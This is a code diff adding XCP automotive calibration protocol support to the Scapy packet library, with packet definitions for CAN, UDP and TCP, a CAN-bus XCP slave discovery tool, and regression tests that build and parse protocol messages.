a/scapy/contrib/automotive/xcp/utils.py b/scapy/contrib/automotive/xcp/utils.py new file mode 100644 index 00000000000..24bb63a6717 --- /dev/null +++ b/scapy/contrib/automotive/xcp/utils.py @@ -0,0 +1,134 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.status = skip + +import struct +from logging import warning + +from scapy.config import conf +from scapy.fields import StrLenField +from scapy.volatile import RandBin, RandNum + + +def get_max_cto(): + max_cto = conf.contribs['XCP']['MAX_CTO'] + if max_cto: + return max_cto + + warning("Define conf.contribs['XCP']['MAX_CTO'].") + raise KeyError("conf.contribs['XCP']['MAX_CTO'] not defined") + + +def get_max_dto(): + max_dto = conf.contribs['XCP']['MAX_DTO'] + if max_dto: + return max_dto + else: + warning("Define conf.contribs['XCP']['MAX_DTO'].") + raise KeyError("conf.contribs['XCP']['MAX_DTO'] not defined") + + +def get_ag(): + address_granularity = conf.contribs['XCP']['Address_Granularity_Byte'] + if address_granularity and address_granularity in [1, 2, 4]: + return address_granularity + else: + warning("Define conf.contribs['XCP']['Address_Granularity_Byte']." + "Assign either 1, 2 or 4") + return 1 + + +# With TIMESTAMP_MODE and TIMESTAMP_TICKS at GET_DAQ_RESOLUTION_INFO, +# the slave informs the master about the Type of Timestamp Field +# the slave will use when transferring DAQ Packets to the master. +# The master has to use the same Type of Timestamp Field when transferring +# STIM Packets to the slave. TIMESTAMP_MODE and TIMEPSTAMP_TICKS contain +# information on the resolution of the data transfer clock. +def get_timestamp_length(): + return conf.contribs['XCP']['timestamp_size'] + + +def identification_field_needs_alignment(): + try: + identification_field_type_0 = conf.contribs['XCP'][ + 'identification_field_type_0'] + identification_field_type_1 = conf.contribs['XCP'][ + 'identification_field_type_1'] + if identification_field_type_1 == 1 and \ + identification_field_type_0 == 1: + # relative odt with daq as word (aligned) + return True + return False + except KeyError: + return False + + +def get_daq_length(): + try: + identification_field_type_0 = conf.contribs['XCP'][ + 'identification_field_type_0'] + identification_field_type_1 = conf.contribs['XCP'][ + 'identification_field_type_1'] + + if identification_field_type_1 == 0 and \ + identification_field_type_0 == 0: + # absolute odt number + return 0 + if identification_field_type_1 == 0 and \ + identification_field_type_0 == 1: + # relative odt with daq as byte + return 1 + # relative odt with daq as word + return 2 + except KeyError: + return 0 + + +def get_daq_data_field_length(): + try: + data_length = get_max_dto() + except KeyError: + return 0 + data_length -= 1 # pid + if identification_field_needs_alignment(): + data_length -= 1 + data_length -= get_daq_length() + + return data_length + + +# Idea taken from scapy/scapy/contrib/dce_rpc.py +class XCPEndiannessField(object): + """Field which changes the endianness of a sub-field""" + __slots__ = ["fld"] + + def __init__(self, fld): + self.fld = fld + + def set_endianness(self): + """Add the endianness to the format""" + byte_oder = conf.contribs['XCP']['byte_order'] + endianness = ">" if byte_oder == 1 else "<" + + self.fld.fmt = endianness + self.fld.fmt[1:] + self.fld.struct = struct.Struct(self.fld.fmt) + + def getfield(self, pkt, s): + self.set_endianness() + + return self.fld.getfield(pkt, s) + + def addfield(self, pkt, s, val): + self.set_endianness() + return self.fld.addfield(pkt, s, val) + + def __getattr__(self, attr): + return getattr(self.fld, attr) + + +class StrVarLenField(StrLenField): + def randval(self): + return RandBin(RandNum(0, self.max_length() or 1200)) diff --git a/scapy/contrib/automotive/xcp/xcp.py b/scapy/contrib/automotive/xcp/xcp.py new file mode 100644 index 00000000000..3dfbc5ce256 --- /dev/null +++ b/scapy/contrib/automotive/xcp/xcp.py @@ -0,0 +1,470 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# Copyright (C) Tabea Spahn +# This program is published under a GPLv2 license + +# scapy.contrib.description = Universal calibration and measurement protocol (XCP) # noqa: E501 +# scapy.contrib.status = loads +import struct + +from scapy.config import conf +from scapy.contrib.automotive.xcp.cto_commands_master import Connect, \ + Disconnect, GetStatus, Synch, GetCommModeInfo, GetId, SetRequest, \ + GetSeed, Unlock, SetMta, Upload, ShortUpload, BuildChecksum, \ + TransportLayerCmd, TransportLayerCmdGetSlaveId, \ + TransportLayerCmdGetDAQId, TransportLayerCmdSetDAQId, UserCmd, Download, \ + DownloadNext, DownloadMax, ShortDownload, ModifyBits, SetCalPage, \ + GetCalPage, GetPagProcessorInfo, GetSegmentInfo, GetPageInfo, \ + SetSegmentMode, GetSegmentMode, CopyCalPage, SetDaqPtr, WriteDaq, \ + SetDaqListMode, GetDaqListMode, StartStopDaqList, StartStopSynch, \ + ReadDaq, GetDaqClock, GetDaqProcessorInfo, GetDaqResolutionInfo, \ + GetDaqListInfo, GetDaqEventInfo, ClearDaqList, FreeDaq, AllocDaq, \ + AllocOdt, AllocOdtEntry, ProgramStart, ProgramClear, Program, \ + ProgramReset, GetPgmProcessorInfo, GetSectorInfo, ProgramPrepare, \ + ProgramFormat, ProgramNext, ProgramMax, ProgramVerify +from scapy.contrib.automotive.xcp.cto_commands_slave import \ + GenericResponse, NegativeResponse, EvPacket, ServPacket, \ + TransportLayerCmdGetSlaveIdResponse, TransportLayerCmdGetDAQIdResponse, \ + SegmentInfoMode0PositiveResponse, SegmentInfoMode1PositiveResponse, \ + SegmentInfoMode2PositiveResponse, ConnectPositiveResponse, \ + StatusPositiveResponse, CommonModeInfoPositiveResponse, \ + IdPositiveResponse, SeedPositiveResponse, UnlockPositiveResponse, \ + UploadPositiveResponse, ShortUploadPositiveResponse, \ + ChecksumPositiveResponse, CalPagePositiveResponse, \ + PagProcessorInfoPositiveResponse, PageInfoPositiveResponse, \ + SegmentModePositiveResponse, DAQListModePositiveResponse, \ + StartStopDAQListPositiveResponse, DAQClockListPositiveResponse, \ + ReadDAQPositiveResponse, DAQProcessorInfoPositiveResponse, \ + DAQResolutionInfoPositiveResponse, DAQListInfoPositiveResponse, \ + DAQEventInfoPositiveResponse, ProgramStartPositiveResponse, \ + PgmProcessorPositiveResponse, SectorInfoPositiveResponse +from scapy.contrib.automotive.xcp.utils import get_timestamp_length, \ + identification_field_needs_alignment, get_daq_length, \ + get_daq_data_field_length +from scapy.fields import ByteEnumField, ShortField, XBitField, \ + FlagsField, ByteField, ThreeBytesField, StrField, ConditionalField, \ + XByteField, StrLenField +from scapy.layers.can import CAN +from scapy.layers.inet import UDP, TCP +from scapy.packet import Packet, bind_layers, bind_bottom_up, bind_top_down + +conf.contribs.setdefault("XCP", {}) + +# 0 stands for Intel/little-endian format, 1 for Motorola/big-endian format +conf.contribs["XCP"].setdefault("byte_order", 1) +conf.contribs["XCP"].setdefault("allow_byte_order_change", True) +# Can be 1, 2 or 4 +conf.contribs["XCP"].setdefault("Address_Granularity_Byte", None) +conf.contribs["XCP"].setdefault("allow_ag_change", True) + +conf.contribs["XCP"].setdefault("MAX_CTO", None) +conf.contribs["XCP"].setdefault("MAX_DTO", None) +conf.contribs["XCP"].setdefault("allow_cto_and_dto_change", True) +conf.contribs["XCP"].setdefault("add_padding_for_can", False) + +conf.contribs['XCP'].setdefault('timestamp_size', 0) + + +# Specifications from: +# http://read.pudn.com/downloads293/doc/comm/1316424/ASAM_XCP_Part1-Overview_V1.0.0.pdf # noqa: E501 +# http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%202-%20Protocol%20Layer%20Specification%20-1.0.pdf # noqa: E501 +# http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%203-%20Transport_layer_specification_xcp_on_can_1-0.pdf # noqa: E501 +# http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%204-%20Interface%20Specification%20-1.0.pdf # noqa: E501 +# http://read.pudn.com/downloads192/doc/comm/903802/XCP%20-Part%205-%20Example%20Communication%20Sequences%20-1.0.pdf # noqa: E501 + +# XCP on USB is left out because it has "no practical meaning" +# XCP on Lin is left out because it has no official specification +class XCPOnCAN(CAN): + name = "Universal calibration and measurement protocol on CAN" + fields_desc = [ + FlagsField("flags", 0, 3, ["error", + "remote_transmission_request", + "extended"]), + XBitField("identifier", 0, 29), + ByteField("length", None), + ThreeBytesField("reserved", 0), + ] + + def post_build(self, pkt, pay): + if self.length is None or \ + (len(pay) < 8 and conf.contribs["XCP"]["add_padding_for_can"]): + tmp_len = 8 if conf.contribs["XCP"]["add_padding_for_can"] else \ + len(pay) + pkt = pkt[:4] + struct.pack("B", tmp_len) + pkt[5:] + pay += b"\xCC" * (tmp_len - len(pay)) + return super(XCPOnCAN, self).post_build(pkt, pay) + + def extract_padding(self, p): + return p, None + + +class XCPOnUDP(UDP): + name = "Universal calibration and measurement protocol on Ethernet" + fields_desc = UDP.fields_desc + [ + ShortField("length", None), + ShortField("ctr", 0), # counter + ] + + def post_build(self, pkt, pay): + if self.length is None: + tmp_len = len(pay) + pkt = pkt[:8] + struct.pack("!H", tmp_len) + pkt[10:] + return super(XCPOnUDP, self).post_build(pkt, pay) + + +class XCPOnTCP(TCP): + name = "Universal calibration and measurement protocol on Ethernet" + + fields_desc = TCP.fields_desc + [ + ShortField("length", None), + ShortField("ctr", 0), # counter + ] + + def answers(self, other): + if not isinstance(other, XCPOnTCP): + return 0 + if isinstance(other.payload, CTORequest) and isinstance(self.payload, + CTOResponse): + return self.payload.answers(other.payload) + + def post_build(self, pkt, pay): + if self.length is None: + len_offset = 20 + len(self.options) + tmp_len = len(pay) + tmp_len = struct.pack("!H", tmp_len) + pkt = pkt[:len_offset] + tmp_len + pkt[len_offset + 2:] + return super(XCPOnTCP, self).post_build(pkt, pay) + + +class XCPOnCANTail(Packet): + name = "XCP Tail on CAN" + + fields_desc = [ + StrField("control_field", "") + ] + + +class CTORequest(Packet): + pids = { + # Standard commands + 0xFF: "CONNECT", + 0xFE: "DISCONNECT", + 0xFD: "GET_STATUS", + 0xFC: "SYNCH", + 0xFB: "GET_COMM_MODE_INFO", + 0xFA: "GET_ID", + 0xF9: "SET_REQUEST", + 0xF8: "GET_SEED", + 0xF7: "UNLOCK", + 0xF6: "SET_MTA", + 0xF5: "UPLOAD", + 0xF4: "SHORT_UPLOAD", + 0xF3: "BUILD_CHECKSUM", + 0xF2: "TRANSPORT_LAYER_CMD", + 0xF1: "USER_CMD", + # Calibration commands + 0xF0: "DOWNLOAD", + 0xEF: "DOWNLOAD_NEXT", + 0xEE: "DOWNLOAD_MAX", + 0xED: "SHORT_DOWNLOAD", + 0xEC: "MODIFY_BITS", + # Page change commands + 0xEB: "SET_CAL_PAGE", + 0xEA: "GET_CAL_PAGE", + 0xE9: "GET_PAG_PROCESSOR_INFO", + 0xE8: "GET_SEGMENT_INFO", + 0xE7: "GET_PAGE_INFO", + 0xE6: "SET_SEGMENT_MODE", + 0xE5: "GET_SEGMENT_MODE", + 0xE4: "COPY_CAL_PAGE", + # Periodic data exchange basics + 0xE2: "SET_DAQ_PTR", + 0xE1: "WRITE_DAQ", + 0xE0: "SET_DAQ_LIST_MODE", + 0xDF: "GET_DAQ_LIST_MODE", + 0xDE: "START_STOP_DAQ_LIST", + 0xDD: "START_STOP_SYNCH", + 0xC7: "WRITE_DAQ_MULTIPLE", + 0xDB: "READ_DAQ", + 0xDC: "GET_DAQ_CLOCK", + 0xDA: "GET_DAQ_PROCESSOR_INFO", + 0xD9: "GET_DAQ_RESOLUTION_INFO", + 0xD8: "GET_DAQ_LIST_INFO", + 0xD7: "GET_DAQ_EVENT_INFO", + # Periodic data exchange static configuration + 0xE3: "CLEAR_DAQ_LIST", + # Cyclic data exchange dynamic configuration + 0xD6: "FREE_DAQ", + 0xD5: "ALLOC_DAQ", + 0xD4: "ALLOC_ODT", + 0xD3: "ALLOC_ODT_ENTRY", + # Flash programming + 0xD2: "PROGRAM_START", + 0xD1: "PROGRAM_CLEAR", + 0xD0: "PROGRAM", + 0xCF: "PROGRAM_RESET", + 0xCE: "GET_PGM_PROCESSOR_INFO", + 0xCD: "GET_SECTOR_INFO", + 0xCC: "PROGRAM_PREPARE", + 0xCB: "PROGRAM_FORMAT", + 0xCA: "PROGRAM_NEXT", + 0xC9: "PROGRAM_MAX", + 0xC8: "PROGRAM_VERIFY", + } + + for pid in range(0, 192): + pids[pid] = "STIM" + name = "Command Transfer Object Request" + + fields_desc = [ + ByteEnumField("pid", 0xFF, pids), + ] + + +# ##### CTO COMMANDS ###### + +# STANDARD COMMANDS +bind_layers(CTORequest, Connect, pid=0xFF) +bind_layers(CTORequest, Disconnect, pid=0xFE) +bind_layers(CTORequest, GetStatus, pid=0xFD) +bind_layers(CTORequest, Synch, pid=0xFC) +bind_layers(CTORequest, GetCommModeInfo, pid=0xFB) +bind_layers(CTORequest, GetId, pid=0xFA) +bind_layers(CTORequest, SetRequest, pid=0xF9) +bind_layers(CTORequest, GetSeed, pid=0xF8) +bind_layers(CTORequest, Unlock, pid=0xF7) +bind_layers(CTORequest, SetMta, pid=0xF6) +bind_layers(CTORequest, Upload, pid=0xF5) +bind_layers(CTORequest, ShortUpload, pid=0xF4) +bind_layers(CTORequest, BuildChecksum, pid=0xF3) +bind_layers(CTORequest, TransportLayerCmd, pid=0xF2) +bind_layers(CTORequest, TransportLayerCmdGetSlaveId, pid=0xF2, + sub_command_code=0xFF) +bind_layers(CTORequest, TransportLayerCmdGetDAQId, pid=0xF2, + sub_command_code=0xFE) +bind_layers(CTORequest, TransportLayerCmdSetDAQId, pid=0xF2, + sub_command_code=0xFD) +bind_layers(CTORequest, UserCmd, pid=0xF1) + +# Calibration Commands +bind_layers(CTORequest, Download, pid=0xF0) +bind_layers(CTORequest, DownloadNext, pid=0xEF) +bind_layers(CTORequest, DownloadMax, pid=0xEE) +bind_layers(CTORequest, ShortDownload, pid=0xED) +bind_layers(CTORequest, ModifyBits, pid=0xEC) + +# Page Switching commands +bind_layers(CTORequest, SetCalPage, pid=0xEB) +bind_layers(CTORequest, GetCalPage, pid=0xEA) +bind_layers(CTORequest, GetPagProcessorInfo, pid=0xE9) +bind_layers(CTORequest, GetSegmentInfo, pid=0xE8) +bind_layers(CTORequest, GetPageInfo, pid=0xE7) +bind_layers(CTORequest, SetSegmentMode, pid=0xE6) +bind_layers(CTORequest, GetSegmentMode, pid=0xE5) +bind_layers(CTORequest, CopyCalPage, pid=0xE4) + +# Cyclic Data exchange Basic commands +bind_layers(CTORequest, SetDaqPtr, pid=0xE2) +bind_layers(CTORequest, WriteDaq, pid=0xE1) +bind_layers(CTORequest, SetDaqListMode, pid=0xE0) +bind_layers(CTORequest, GetDaqListMode, pid=0xDF) +bind_layers(CTORequest, StartStopDaqList, pid=0xDE) +bind_layers(CTORequest, StartStopSynch, pid=0xDD) +bind_layers(CTORequest, ReadDaq, pid=0xDB) +bind_layers(CTORequest, GetDaqClock, pid=0xDC) +bind_layers(CTORequest, GetDaqProcessorInfo, pid=0xDA) +bind_layers(CTORequest, GetDaqResolutionInfo, pid=0xD9) +bind_layers(CTORequest, GetDaqListInfo, pid=0xD8) +bind_layers(CTORequest, GetDaqEventInfo, pid=0xD7) + +# Cyclic data transfer - static configuration commands +bind_layers(CTORequest, ClearDaqList, pid=0xE3) + +# Cyclic Data transfer - dynamic configuration commands +bind_layers(CTORequest, FreeDaq, pid=0xD6) +bind_layers(CTORequest, AllocDaq, pid=0xD5) +bind_layers(CTORequest, AllocOdt, pid=0xD4) +bind_layers(CTORequest, AllocOdtEntry, pid=0xD3) + +# Flash Programming commands +bind_layers(CTORequest, ProgramStart, pid=0xD2) +bind_layers(CTORequest, ProgramClear, pid=0xD1) +bind_layers(CTORequest, Program, pid=0xD0) +bind_layers(CTORequest, ProgramReset, pid=0xCF) +bind_layers(CTORequest, GetPgmProcessorInfo, pid=0xCE) +bind_layers(CTORequest, GetSectorInfo, pid=0xCD) +bind_layers(CTORequest, ProgramPrepare, pid=0xCC) +bind_layers(CTORequest, ProgramFormat, pid=0xCB) +bind_layers(CTORequest, ProgramNext, pid=0xCA) +bind_layers(CTORequest, ProgramMax, pid=0xC9) +bind_layers(CTORequest, ProgramVerify, pid=0xC8) + + +# ##### DTOs ##### +# Master -> Slave: STIM (Stimulation) +# Slave -> Master: DAQ (Data AcQuisition) +class DTO(Packet): + name = "Data transfer object" + fields_desc = [ + ConditionalField(XByteField("fill", 0x00), + lambda _: identification_field_needs_alignment()), + ConditionalField( + StrLenField("daq", b"", length_from=lambda _: get_daq_length()), + lambda _: get_daq_length() > 0), + ConditionalField( + StrLenField("timestamp", b"", + length_from=lambda _: get_timestamp_length()), + lambda _: get_timestamp_length() > 0), + ConditionalField( + StrLenField("data", b"", + length_from=lambda _: get_daq_data_field_length()), + lambda _: get_daq_data_field_length() > 0) + ] + + +for pid in range(0, 0xBF + 1): + bind_layers(CTORequest, DTO, pid=pid) + + +class CTOResponse(Packet): + packet_codes = { + 0xFF: "RES", + 0xFE: "ERR", + 0xFD: "EV", + 0xFC: "SERV", + } + name = "Command Transfer Object Response" + + fields_desc = [ + ByteEnumField("packet_code", 0xFF, packet_codes), + ] + + @staticmethod + def get_positive_response_cls(request): + # The pid of the request this packet is the response for + request_pid = request.pid + # First check the special cases with sub commands + # They can't be fit in a simple dictionary, + # so deal with them separately + if request_pid == 0xF2: + if request.sub_command_code == 255: + return TransportLayerCmdGetSlaveIdResponse + if request.sub_command_code == 254: + return TransportLayerCmdGetDAQIdResponse + if request_pid == 0xE8: + if request.mode == "get_basic_address_info": + return SegmentInfoMode0PositiveResponse + if request.mode == "get_standard_info": + return SegmentInfoMode1PositiveResponse + if request.mode == "get_address_mapping_info": + return SegmentInfoMode2PositiveResponse + return {0xFF: ConnectPositiveResponse, + 0xFD: StatusPositiveResponse, + 0xFB: CommonModeInfoPositiveResponse, + 0xFA: IdPositiveResponse, + 0xF8: SeedPositiveResponse, + 0xF7: UnlockPositiveResponse, + 0xF5: UploadPositiveResponse, + 0xF4: ShortUploadPositiveResponse, + 0xF3: ChecksumPositiveResponse, + 0xEA: CalPagePositiveResponse, + 0xE9: PagProcessorInfoPositiveResponse, + 0xE7: PageInfoPositiveResponse, + 0xE5: SegmentModePositiveResponse, + 0xDF: DAQListModePositiveResponse, + 0xDE: StartStopDAQListPositiveResponse, + 0xDC: DAQClockListPositiveResponse, + 0xDB: ReadDAQPositiveResponse, + 0xDA: DAQProcessorInfoPositiveResponse, + 0xD9: DAQResolutionInfoPositiveResponse, + 0xD8: DAQListInfoPositiveResponse, + 0xD7: DAQEventInfoPositiveResponse, + 0xD2: ProgramStartPositiveResponse, + 0xCE: PgmProcessorPositiveResponse, + 0xCD: SectorInfoPositiveResponse, + }.get(request_pid, GenericResponse) + + def answers(self, request): + """In XCP, the payload of a response packet is dependent on the pid + field of the corresponding request. + This method changes the class of the payload to the class + which is expected for the given request.""" + if not isinstance(request, CTORequest): + return False + + # FE: Negative Response + # FD: Event Packet + # FC: Service Packet + # They are always a valid response + if self.packet_code in [0xFE, 0xFD, 0xFC]: + return True + # FF: Positive Response + if self.packet_code != 0xFF: + return False + + payload_cls = self.get_positive_response_cls(request) + + minimum_expected_byte_count = len(payload_cls()) + given_byte_count = len(self.payload) + + if given_byte_count < minimum_expected_byte_count: + return False + + # Even if there are enough bytes, we can't be sure that they align + # correctly to the fields. Then a struct.error exception is thrown. + # For example + # Fields: byte, byte, short + # Packet: 01 02 03 + # This would fail because there are enough bytes that scapy starts + # to parse the short field, but there are actually not enough bytes + # to fill it. + try: + data = bytes(self.payload) + self.remove_payload() + self.add_payload(payload_cls(data)) + except struct.error: + return False + return True + + +for pid in range(0, 0xFB + 1): + bind_layers(CTOResponse, DTO, pid=pid) + +positive_response_classes = [ConnectPositiveResponse, + StatusPositiveResponse, + CommonModeInfoPositiveResponse, + IdPositiveResponse, + SeedPositiveResponse, + UnlockPositiveResponse, + UploadPositiveResponse, + ShortUploadPositiveResponse, + ChecksumPositiveResponse, + CalPagePositiveResponse, + PagProcessorInfoPositiveResponse, + PageInfoPositiveResponse, + SegmentModePositiveResponse, + DAQListModePositiveResponse, + StartStopDAQListPositiveResponse, + DAQClockListPositiveResponse, + ReadDAQPositiveResponse, + DAQProcessorInfoPositiveResponse, + DAQResolutionInfoPositiveResponse, + DAQListInfoPositiveResponse, + DAQEventInfoPositiveResponse, + ProgramStartPositiveResponse, + PgmProcessorPositiveResponse, + SectorInfoPositiveResponse] + +for cls in positive_response_classes: + bind_top_down(CTOResponse, cls, packet_code=0xFF) + +bind_layers(CTOResponse, NegativeResponse, packet_code=0xFE) + +# Asynchronous Event/request messages from the slave +bind_layers(CTOResponse, EvPacket, packet_code=0xFD) +bind_layers(CTOResponse, ServPacket, packet_code=0xFC) + +bind_bottom_up(XCPOnCAN, CTOResponse) +bind_bottom_up(XCPOnUDP, CTOResponse) +bind_bottom_up(XCPOnTCP, CTOResponse) diff --git a/scapy/tools/automotive/xcpscanner.py b/scapy/tools/automotive/xcpscanner.py new file mode 100755 index 00000000000..d79019f28a1 --- /dev/null +++ b/scapy/tools/automotive/xcpscanner.py @@ -0,0 +1,120 @@ +#! /usr/bin/env python + +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Fabian Wiche +# Copyright (C) Tabea Spahn + +# This program is published under a GPLv2 license +import argparse +import signal +import sys + +from scapy.contrib.automotive.xcp.scanner import XCPOnCANScanner +from scapy.contrib.automotive.xcp.xcp import XCPOnCAN +from scapy.contrib.cansocket import CANSocket + + +class ScannerParams: + def __init__(self): + self.id_range = None + self.sniff_time = None + self.verbose = False + self.channel = None + self.broadcast = False + + +def signal_handler(sig, _frame): + sys.stderr.write("Interrupting scan!\n") + # Use same convention as the bash shell + # 128+n where n is the fatal error signal + # https://tldp.org/LDP/abs/html/exitcodes.html#EXITCODESREF + sys.exit(128 + sig) + + +def init_socket(scan_params): + print("Initializing socket for " + scan_params.channel) + try: + sock = CANSocket(scan_params.channel) + except Exception as e: + sys.stderr.write("\nSocket could not be created: " + str(e) + "\n") + sys.exit(1) + sock.basecls = XCPOnCAN + return sock + + +def parse_inputs(): + scanner_params = ScannerParams() + + parser = argparse.ArgumentParser() + parser.description = "Finds XCP slaves using the XCP Broadcast-CAN " \ + "identifier." + parser.add_argument('--start', '-s', + help='Start ID CAN (in hex).\n' + 'If actual ID is unknown the scan will ' + 'test broadcast ids between --start and --end ' + '(inclusive). Default: 0x00') + parser.add_argument('--end', '-e', + help='End ID CAN (in hex).\n' + 'If actual ID is unknown the scan will test ' + 'broadcast ids between --start and --end ' + '(inclusive). Default: 0x7ff') + parser.add_argument('--sniff_time', '-t', + help='Duration in milliseconds a sniff is waiting ' + 'for a response.', type=int, default=100) + parser.add_argument('channel', + help='Linux SocketCAN interface name, e.g.: vcan0') + parser.add_argument('--verbose', '-v', action="store_true", + help='Display information during scan') + parser.add_argument('--broadcast', '-b', action="store_true", + help='Use Broadcast-message GetSlaveId instead of ' + 'default "Connect"') + + args = parser.parse_args() + scanner_params.channel = args.channel + scanner_params.verbose = args.verbose + scanner_params.use_broadcast = args.broadcast + scanner_params.sniff_time = float(args.sniff_time) / 1000 + + start_id = int(args.start, 16) if args.start is not None else 0 + end_id = int(args.end, 16) if args.end is not None else 0x7ff + + if start_id > end_id: + parser.error( + "End identifier must not be smaller than the start identifier.") + sys.exit(1) + scanner_params.id_range = range(start_id, end_id + 1) + + return scanner_params + + +def main(): + scanner_params = parse_inputs() + can_socket = init_socket(scanner_params) + + try: + scanner = XCPOnCANScanner(can_socket, + id_range=scanner_params.id_range, + sniff_time=scanner_params.sniff_time, + verbose=scanner_params.verbose) + + signal.signal(signal.SIGINT, signal_handler) + + results = scanner.scan_with_get_slave_id() \ + if scanner_params.broadcast \ + else scanner.scan_with_connect() # Blocking + + if isinstance(results, list) and len(results) > 0: + for r in results: + print(r) + else: + print("Detected no XCP slave.") + except Exception as err: + sys.stderr.write(str(err) + "\n") + sys.exit(1) + finally: + can_socket.close() + + +if __name__ == "__main__": + main() diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 7354ea3d6d3..09566be1a59 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -6,6 +6,7 @@ "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", + "test/contrib/automotive/xcp/*.uts", "test/contrib/*.uts" ], "remove_testfiles": [ diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 4befd12ecb6..3bf3d23c3fc 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -8,6 +8,7 @@ "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", + "test/contrib/automotive/xcp/*.uts", "test/tls/tests_tls_netaccess.uts" ], "remove_testfiles": [ diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index a508990b2ad..dc07a27ebaa 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -6,6 +6,7 @@ "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", + "test/contrib/automotive/xcp/*.uts", "test/contrib/*.uts" ], "remove_testfiles": [ diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 1d2507c5389..a37ab5873e2 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -6,6 +6,7 @@ "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", "test\\contrib\\automotive\\bmw\\*.uts", + "test\\contrib\\automotive\\xcp\\*.uts", "test\\contrib\\automotive\\*.uts", "test\\contrib\\*.uts" ], diff --git a/test/contrib/automotive/xcp/xcp.uts b/test/contrib/automotive/xcp/xcp.uts new file mode 100644 index 00000000000..98d7023ded6 --- /dev/null +++ b/test/contrib/automotive/xcp/xcp.uts @@ -0,0 +1,871 @@ +% Regression tests for the XCP +~ needs_root + +# More information at http://www.secdev.org/projects/UTscapy/ + +############ +############ + ++ Basic operations += Imports + +from scapy.config import conf +from scapy.contrib.automotive.xcp.cto_commands_master import GetCommModeInfo, GetStatus, GetSeed, Unlock, GetId, Upload, GetCalPage, SetMta, BuildChecksum, Download, ShortUpload, CopyCalPage, GetDaqProcessorInfo, GetDaqResolutionInfo, GetDaqEventInfo, GetDaqListInfo, ClearDaqList, AllocDaq, AllocOdt, AllocOdtEntry, SetDaqPtr, WriteDaq, SetDaqListMode, StartStopDaqList, GetDaqClock, StartStopSynch, ProgramStart, ProgramClear, Program +from scapy.contrib.automotive.xcp.cto_commands_slave import NegativeResponse +from scapy.contrib.automotive.xcp.xcp import CTORequest, CTOResponse +from scapy.main import load_layer + + += Load module + +load_layer("can", globals_dict=globals()) +load_contrib("automotive.xcp.xcp", globals_dict=globals()) + + += Test padding + +conf.contribs["XCP"]["add_padding_for_can"] = True + +pkt = XCPOnCAN(identifier=0x700) / CTORequest() / Connect() +build_pkt = pkt.do_build() +assert build_pkt == b'\x00\x00\x07\x00\x08\x00\x00\x00\xff\x00\xcc\xcc\xcc\xcc\xcc\xcc' +conf.contribs["XCP"]["add_padding_for_can"] = False + += test_get_com_mode_info +conf.contribs["XCP"]["add_padding_for_can"] = False + +cto_request = CTORequest() / GetCommModeInfo() +assert cto_request.pid == 0xfb +assert bytes(cto_request) == b'\xfb' + +cto_response = CTOResponse(b'\xff\x00\x01\x00\x02\x00\x00\x64') +assert cto_response.packet_code == 0xFF + +assert cto_response.answers(cto_request) + +get_comm_mode_info_response = cto_response["CommonModeInfoPositiveResponse"] +assert "master_block_mode" in get_comm_mode_info_response.comm_mode_optional +assert get_comm_mode_info_response.max_bs == 0x02 +assert get_comm_mode_info_response.min_st == 0x00 +assert get_comm_mode_info_response.xcp_driver_version_number == 0x64 + += test_get_status + +cto_request = CTORequest() / GetStatus() +assert cto_request.pid == 0xfd +assert bytes(cto_request) == b'\xfd' + +cto_response = CTOResponse(b'\xff\x00\x15\x00\x00\x00') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +get_comm_mode_info_response = cto_response["StatusPositiveResponse"] +assert get_comm_mode_info_response.current_session_status == 0x00 +assert "cal_pag" in get_comm_mode_info_response.current_resource_protection_status +assert "x1" not in get_comm_mode_info_response.current_resource_protection_status +assert "daq" in get_comm_mode_info_response.current_resource_protection_status +assert "stim" not in get_comm_mode_info_response.current_resource_protection_status +assert "pgm" in get_comm_mode_info_response.current_resource_protection_status +assert "x5" not in get_comm_mode_info_response.current_resource_protection_status +assert "x6" not in get_comm_mode_info_response.current_resource_protection_status +assert "x7" not in get_comm_mode_info_response.current_resource_protection_status + +assert get_comm_mode_info_response.session_configuration_id == 0x0000 + += test_get_seed + +conf.contribs['XCP']['MAX_CTO'] = 8 +cto_request = CTORequest() / GetSeed(b'\x00\x01') +assert cto_request.pid == 0xf8 +assert bytes(cto_request) == b'\xf8\x00\x01' + +cto_response = CTOResponse(b'\xff\x06\x00\x01\x02\x03\x04\x05') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +get_seed_response = cto_response["SeedPositiveResponse"] +assert get_seed_response.seed_length == 0x06 +assert get_seed_response.seed == b'\x00\x01\x02\x03\x04\x05' + += test_unlock + +conf.contribs['XCP']['MAX_CTO'] = 8 +cto_request = CTORequest() / Unlock(b'\x06\x69\xAB\xA6\x00\x00\x00') +assert cto_request.pid == 0xf7 +assert cto_request['Unlock'].len == 0x06 +assert cto_request['Unlock'].seed == b'\x69\xAB\xA6\x00\x00\x00' +assert bytes(cto_request) == b'\xf7\x06\x69\xAB\xA6\x00\x00\x00' + +cto_response = CTOResponse(b'\xff\x14') +assert cto_response.packet_code == 0xFF +assert cto_response.answers(cto_request) + +unlock_response = cto_response["UnlockPositiveResponse"] +assert unlock_response.current_resource_protection_status == 0x14 +assert "cal_pag" not in unlock_response.current_resource_protection_status +assert "x1" not in unlock_response.current_resource_protection_status 